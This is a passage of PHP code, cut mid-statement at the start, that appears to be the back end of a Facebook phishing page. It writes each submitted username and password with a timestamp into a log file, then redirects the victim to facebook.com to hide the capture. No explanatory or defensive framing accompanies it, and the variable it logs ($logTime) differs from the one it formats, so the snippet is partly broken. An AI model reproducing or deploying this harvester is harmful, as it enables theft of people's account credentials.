modify("+$gmt hours"); $formattedDateTime = $dateTime->format('m/d/Y H:i'); fwrite($file, "$logTime\n\nUsername: $username\nPassword: $password\n________________\n\n"); fclose($file); header("Location: https://facebook.com"); exit(); } else { echo "Unable to open file."; } ?>